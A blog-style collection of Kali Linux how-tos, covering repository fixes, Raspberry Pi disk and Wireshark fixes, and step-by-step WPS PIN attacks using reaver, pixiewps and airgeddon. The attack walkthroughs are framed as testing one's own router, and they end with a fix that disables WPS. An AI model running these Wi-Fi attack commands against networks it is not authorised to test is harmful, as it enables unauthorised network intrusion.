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Kali Linux / Backtrack Information, How-To’s, Tips, Tools, and Guides

KALI – Unable to Locate Package

  • Kali

How-To Ensure Your Repos Are Correct

sudo nano /etc/apt/sources.list

Add the following if they are not already in the file:

deb kali-rolling main non-free contrib
deb-src kali-rolling main non-free contrib

Save and Exit the File

sudo apt-get update

Your packages should now be available

Pixie Dust Attacks

Test and Secure YOUR Network Only

Run this from a linux box, against your network. Do not run this against any other network out there. It is easy to find the attacker, it is easy to prosecute the bad actor. Be very careful with this attack.

I would suggest installing Ubuntu, Kali, or ParrotOS and running from a USB drive, connected to your computer or laptop.

Open a termina

sudo bash

apt-get update
apt-get upgrade

apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps

git clone

cd reaver-wps-fork-t6x/
cd src/
make install

airmon-ng check kill
airmon-ng start wlan1

‘wash -i {monitor-interface}’

Identify your target (YOUR NETWORK ONLY) and note the name, bssid and channel. Make sure the signal is strong

reaver -i wlan1 -b {BSSID of router} -c {router channel} -vvv -K 1 -f

Your attack is now running

How to Install AIRGEDDON

This info is specific to Linux only

Open a terminal

sudo bash

mkdir /tools & cd /tools

git clone

cd airgeddon


sudo bash


apt-get install and name of tool thats missing

After the dependencies are all installed, run ./ and begin the configuration

Select your wireless card

Put wireless card into monitoring mode

Select WPS attacks menu – option 8

Select option 4

Select 2.4 ghz

Testing and Securing Against a WPS Attack

How To Check If You Are Vulnerable, and Then Secure Your Network

First you will want to download and install reaver, wash and airmon-ng.  If you are running Kali or Parrot, it is already there.  You will also need a wireless adapter that is capable of packet injection.  Assuming you have those, you will want to open a terminal and run the following

sudo bash


Note which adapter is your wireless card, that is capable of packet injection.  For the rest of this, lets assume it is wlan0.

airmon-ng check kill

wash -i wlan0

Note the BSSID of your Wireless Access Point / Wireless Router

reaver -i wlan0 -b MacAddressOfMyRouter -vv 

After some time my router/ap gave up the ghost.  It showed my WPS pin.  I am running a wireless router with a Broadcom chip, which is susceptible.

To fix this, I had to log into my wireless router, navigate to the WPS settings, and I changed it from Enabled to Disabled.  I saved the settings, and voila…I haven’t been able to crack the WPS pin again

Clean Out Files on Raspberry Pi

Fix Those DISK FULL Errors in Kali on Your Raspberry Pi

The Kali Linux image for the Raspberry Pi only has 7.2GB of space by default, and it fills quickly.  If you haven’t expanded, or are unable to expand for any reason, this will allow you to regain some space.

Simply run the following command from the Terminal:

apt-get autoclean

Thats it!  Make sure you run this command periodically for housekeeping purposes.

Thanks for reading

Hardware that I use:
Raspberry Pi 4 (4gb)

SanDisk 32GB Ultra microSDHC UHS-I Memory Card with Adapter

CanaKit 3.5A Raspberry Pi 4 Power Supply (USB-C)

CanaKit Raspberry Pi 4 Micro HDMI Cable – 6 Feet

Western Digital 500GB WD_Black SN750 NVMe

Plugable USB C to M.2 NVMe Tool-free Enclosure

Wireshark Lua Error in Kali Linux on a Raspberry Pi

How to Fix the LUA Wireshark Error on Kali Linux

Loading up Wireshark for the first time, you will see the following error:

Lua: Error during loading:
“/usr/share/wireshark/init.lua.32: dofile has been disabled due to running Wireshark as superuser”…….

Fixing it is easy and quick.  First:

nano /usr/share/wireshark/init.lua.32

Look for the following line
disable_lua = false

Change the values to
disable_lua = true

Save and exit the file

Then restart wireshark from the terminal, and the error is gone

Thanks for reading

Hardware that I use:
Raspberry Pi 4 (4gb)

SanDisk 32GB Ultra microSDHC UHS-I Memory Card with Adapter

CanaKit 3.5A Raspberry Pi 4 Power Supply (USB-C)

CanaKit Raspberry Pi 4 Micro HDMI Cable – 6 Feet

Western Digital 500GB WD_Black SN750 NVMe

Plugable USB C to M.2 NVMe Tool-free Enclosure

Running GParted on a Raspberry Pi with Kali Linux

Expanding Your Root Partition with GPARTED

Installing Kali linux onto a MicroSD card can be quick and easy.  The one main drawback is the default image size of Kali for the Raspberry Pi is only 7GB, which fills up quickly.  This guide will walk you through taking your default install, and expanding it to the maximum size available with your hardware.

To expand it:

apt-get update && apt-get upgrade -y

apt-get install gparted -y


Select the line with the “/” Mount Point

Click Partition at the top

Click Resize

In the Bar graph at the top of the dialog box you will see Yellow/White/Grey which represents used space, free space, and unallocated space.

Between the yellow and grey you can Select the area and Drag the line over to the right to the maximum size

Select Resize

Click the Edit tab at the top

To commit the changes, click Apply All Operations

Your Drive will grow to the maximum size and you are done!

Thanks for reading

Hardware that I use:
Raspberry Pi 4 (4gb)

SanDisk 32GB Ultra microSDHC UHS-I Memory Card with Adapter

CanaKit 3.5A Raspberry Pi 4 Power Supply (USB-C)

CanaKit Raspberry Pi 4 Micro HDMI Cable – 6 Feet

Western Digital 500GB WD_Black SN750 NVMe

Plugable USB C to M.2 NVMe Tool-free Enclosure